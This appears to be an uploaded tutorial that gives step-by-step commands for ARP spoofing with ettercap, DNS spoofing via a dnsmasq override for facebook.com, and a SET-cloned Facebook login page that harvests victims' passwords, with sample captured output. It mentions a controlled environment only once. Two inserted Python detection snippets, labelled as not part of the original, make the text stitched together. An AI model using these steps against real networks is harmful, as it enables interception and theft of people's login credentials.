Securitee Attack

Uploaded by tahya.lehbib

DNS Spoofing Attack with Credential Harvesting

Concept:

This attack combines DNS spoofing (or DNS poisoning) with credential harvesting via
phishing. It manipulates how domain names are resolved in a network and directs
users to a malicious site that appears legitimate. When the victim interacts with this
cloned site, their credentials (like usernames and passwords) are captured by the
attacker.

Key Components of the Attack:

1. DNS Spoofing:
○ DNS (Domain Name System) translates domain names (like
facebook.com) into IP addresses (like 192.168.0.1).
○ In DNS spoofing, the attacker intercepts this process by poisoning the
DNS resolution table of the victim or router. This means that when the
victim types a domain name, they are redirected to the attacker’s IP
address instead of the legitimate website.
○ The attacker controls where the user’s traffic goes, leading them to a
fake (phishing) site.
2. ARP Spoofing (Man-in-the-Middle):
○ ARP (Address Resolution Protocol) Spoofing allows the attacker to
position themselves between the victim and the router. By doing so, the
attacker can monitor or manipulate traffic, allowing them to reroute DNS
requests.
○ This is essential to perform DNS spoofing as it gives the attacker
control over network traffic between the victim and the router.
3. Phishing and Credential Harvesting:
○ Phishing is a social engineering attack where a cloned version of a
legitimate site (e.g., facebook.com) is used to trick the victim into
entering sensitive information, such as login credentials.
○ Using tools like the Social Engineering Toolkit (SET), the attacker
clones the login page of a popular website and hosts it on their own
server.
○ When the victim is redirected to this fake site (due to DNS spoofing) and
enters their credentials, the information is sent to the attacker instead of
the legitimate site.

STEPS

Step 1: ARP Spoofing with ettercap (Man-in-the-Middle Setup)

Objective: Intercept the traffic between the victim's device and the router.
Steps:

1. Open Terminal and Start ettercap:

Launch ettercap in text mode:

    sudo ettercap -T -q -M arp:remote /[victim_IP]/ /[router_IP]/

○ Replace [victim_IP] with the IP address of the victim and
[router_IP] with the IP of the router.
○ This command will start ARP poisoning, tricking both the router and the
victim into thinking your machine is the legitimate connection point,
intercepting their traffic.
2. Verify ARP Spoofing:

You can use the arpspoof command to ensure you are intercepting the traffic:

    sudo arpspoof -i wlan0 -t [victim_IP] [router_IP]

Step 2: DNS Spoofing with dnsmasq

Objective: Redirect the victim's DNS requests for specific domains (like
facebook.com) to your malicious server, where a phishing page is hosted.

Steps:

1. Install dnsmasq (if not installed):

Use the following command to install it:

    sudo apt-get install dnsmasq

2. Configure dnsmasq to Spoof DNS Requests:

Open the dnsmasq.conf file to set up DNS spoofing:

    sudo nano /etc/dnsmasq.conf

Add the following line to redirect traffic for a legitimate domain (e.g.,
facebook.com) to your malicious server's IP (e.g., your Kali machine’s IP):

    address=/facebook.com/[your_Kali_IP]

○ Save and exit the file.
3. Start dnsmasq Service:

Start the DNS service with:

    sudo service dnsmasq start

4. Verify DNS Spoofing:
○ Test if the victim’s DNS requests are being redirected to your server.
You can use a different machine or virtual machine to check if visiting
facebook.com leads to your Kali IP.
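A defender who inherits a resolver like the one configured in Step 2 wants to know whether its dnsmasq.conf carries address= overrides of the kind shown above. This added example (not part of the original document) parses the address= syntax dnsmasq uses and flags overrides that send a public-looking name to a private address; the config excerpt, the local_suffixes list and the function names are constructed for the example.

```python
import ipaddress

# Constructed dnsmasq.conf excerpt for this example (not a real host's config).
SAMPLE_CONF = """\
# constructed excerpt
interface=wlan0
address=/facebook.com/192.168.0.20
address=/printer.lan/192.168.0.5
address=/ads.example/
address=/login.example.com/mail.example.com/10.0.0.7
"""

def parse_address_lines(conf_text):
    """Yield (domain, target_or_None) for every address= directive.
    dnsmasq syntax is address=/dom1/dom2/.../ip; a trailing empty field
    (address=/dom/) means NXDOMAIN rather than an address."""
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line.startswith("address="):
            continue
        fields = line[len("address="):].split("/")
        # fields[0] is the empty string before the leading slash
        domains, target = fields[1:-1], fields[-1] or None
        for dom in domains:
            yield dom, target

def suspicious_overrides(conf_text, local_suffixes=(".lan", ".local", ".internal")):
    """Return (domain, ip) overrides that point a non-internal name at a
    private address. Names ending in local_suffixes are assumed internal."""
    hits = []
    for dom, target in parse_address_lines(conf_text):
        if target is None or dom.endswith(local_suffixes):
            continue
        if ipaddress.ip_address(target).is_private:
            hits.append((dom, target))
    return hits

if __name__ == "__main__":
    for dom, ip in suspicious_overrides(SAMPLE_CONF):
        print(f"override {dom} -> {ip}")
```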

Step 3: Set Up a Phishing Page with SET (Social Engineering Toolkit)

Objective: Create a fake login page (e.g., Facebook or Gmail) to capture the victim’s
credentials once they are redirected by DNS spoofing.

Steps:

1. Launch SET:

Run the following command to launch the Social Engineering Toolkit:

    sudo setoolkit

2. Select Website Attack Vectors:

Once SET is launched, select the option for Website Attack Vectors:

    1) Social-Engineering Attacks
    2) Website Attack Vectors


3. Choose Credential Harvester Attack Method:
Choose the Credential Harvester Attack Method to clone the website and capture
login details:

    3) Credential Harvester Attack Method


4. Clone a Website (Facebook Example):

Select the option to Clone a Website and provide the URL of the site you want to
clone (e.g., facebook.com):

    2) Site Cloner
    Enter the URL: https://www.facebook.com


5. Set Your Kali IP for Harvesting:

Enter the IP address of your Kali machine (which the victim will be redirected to via
DNS spoofing). This is where the phishing page will be hosted:

    Enter the IP address to redirect the victim: [your_Kali_IP]


6. Start Credential Harvester:
○ SET will clone the website and create a phishing page that looks
identical to the real Facebook login page. It will also start capturing
credentials entered into the fake login page.

Step 4: Capture Credentials

Objective: Monitor the victim’s interaction with your phishing page and capture their
login credentials.

Steps:

1. Monitor the Phishing Page:

○ As soon as the victim visits facebook.com, they will be redirected to
your cloned phishing page. When they try to log in, their credentials will
be captured.
2. View Captured Credentials:
○ SET will automatically log any credentials entered on the phishing page
and display them in the terminal. You can find them in the harvester
logs generated by SET.
For example:

    [!] Credentials captured:
    Username: [email protected]
    Password: victim_password123


3. Optional: Use Wireshark to Analyze Network Traffic:
○ Open Wireshark and monitor the network traffic to further analyze the
packets and confirm that DNS requests are being spoofed, and
credentials are being transmitted over the network.

Step 5: Clean Up

Once you've completed the attack in a controlled environment, be sure to stop the
ARP spoofing and DNS services to restore normal network operations.

Stop ARP spoofing:

    sudo ettercap -C

Stop DNS spoofing:

    sudo service dnsmasq stop
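The Key Components section and the verification steps above describe what this attack does to a victim's network view: the gateway's entry in the victim's ARP cache is rewritten to the attacker's MAC, and a public domain such as facebook.com starts resolving to a LAN address. This added example (not from the original document) checks a host for exactly those two indicators; the ARP snapshots, DNS answers, addresses and MACs are constructed, and the function names are this example's own.

```python
import ipaddress
from collections import defaultdict

# Constructed ARP cache snapshots (ip -> mac) from the victim's machine:
# one taken before the attack, one while ettercap's arp:remote is running.
ARP_BEFORE = {
    "192.168.0.1": "aa:bb:cc:00:00:01",   # router
    "192.168.0.20": "aa:bb:cc:00:00:20",  # attacker's host, an ordinary peer so far
}
ARP_AFTER = {
    "192.168.0.1": "aa:bb:cc:00:00:20",   # router now carries the attacker's MAC
    "192.168.0.20": "aa:bb:cc:00:00:20",
}

# Constructed DNS answers as the victim's resolver returns them during the attack.
DNS_ANSWERS = [
    ("facebook.com", "192.168.0.20"),  # what address=/facebook.com/[your_Kali_IP] yields
    ("example.com", "93.184.216.34"),  # ordinary public answer
]

def arp_spoof_indicators(before, after, gateway_ip):
    """Findings for ARP poisoning: the gateway's MAC changed between the two
    snapshots, or one MAC now answers for several IPs."""
    findings = []
    if before.get(gateway_ip) != after.get(gateway_ip):
        findings.append(f"gateway {gateway_ip} MAC changed "
                        f"{before.get(gateway_ip)} -> {after.get(gateway_ip)}")
    owners = defaultdict(list)
    for ip, mac in after.items():
        owners[mac].append(ip)
    for mac, ips in owners.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} answers for {sorted(ips)}")
    return findings

def dns_spoof_indicators(answers):
    """Findings for DNS spoofing: an Internet domain resolving to a private,
    loopback or link-local address. Apply only to names expected to be public;
    intranet names legitimately resolve to LAN addresses."""
    findings = []
    for qname, rdata in answers:
        addr = ipaddress.ip_address(rdata)
        if addr.is_private or addr.is_loopback or addr.is_link_local:
            findings.append(f"{qname} -> {rdata} (non-public address)")
    return findings

if __name__ == "__main__":
    print(arp_spoof_indicators(ARP_BEFORE, ARP_AFTER, "192.168.0.1"))
    print(dns_spoof_indicators(DNS_ANSWERS))
```

On a real host the snapshots would come from the ARP cache (e.g. `ip neigh`) and the answers from the stub resolver; a clean run returns two empty lists.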

Summary of Tools Used:

1. Ettercap: For ARP spoofing to establish the Man-in-the-Middle.
2. dnsmasq: For DNS spoofing, redirecting the victim to your phishing page.
3. SET (Social Engineering Toolkit): To clone the target website and capture
credentials.
